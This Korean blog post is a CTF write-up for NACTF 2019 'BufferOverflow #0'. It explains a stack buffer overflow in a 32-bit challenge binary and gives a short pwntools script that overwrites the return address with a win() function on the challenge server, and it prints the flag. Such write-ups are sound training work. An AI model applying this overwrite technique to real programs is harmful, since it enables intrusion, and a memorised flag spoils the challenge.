일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 |
Tags
- RTL
- DFS
- House of Orange
- off by one
- 백트래킹
- 이분 탐색
- 스택
- 동적 계획법
- BOF
- 에라토스테네스의 체
- 분할 정복
- tcache
- fsb
- 수학
- 큐
- 다이나믹 프로그래밍
- heap
- 완전 탐색
- 이진트리
- OOB
- 연결리스트
- ROP
- 투 포인터
- 스위핑 알고리즘
- syscall
- 브루트 포스
- 이진 탐색
- BFS
- 문자열 처리
- 포맷스트링버그
Archives
- Today
- Total
SDJ( 수돈재 아님 ㅎ )
NACTF 2019 - BufferOverflow #0 본문
32비트 바이너리에 partial RELRO만 걸려있다.
바이너리 안에 flag를 읽어주는 win()함수가 있다.
그리고 vuln()함수에서 BOF가 발생하므로
ret를 win()의 주소로 덮어주면 된다.
exploit code
1
2
3
4
5
6
7
8
9
10
11
12
|
from pwn import *
#p = process('./bufover-0')
p = remote("shell.2019.nactf.com",31475)
win = 0x080491C2
pay = 'a'*0x18
pay += 'b'*4
pay += p32(win)
p.sendline(pay)
p.interactive()
|
아주 기초적인 BOF문제.
flag: nactf{0v3rfl0w_th4at_buff3r_18ghKusB}
'write-up > pwnable' 카테고리의 다른 글
NACTF 2019 - BufferOverflow #2 (0) | 2019.09.23 |
---|---|
NACTF 2019 - BufferOverflow #1 (0) | 2019.09.23 |
HSCTF 2019 - Storytime (0) | 2019.09.16 |
HSCTF 2019 - Combo Chain (0) | 2019.09.16 |
HSCTF 2019 - Combo Chain Lite (0) | 2019.09.16 |
Comments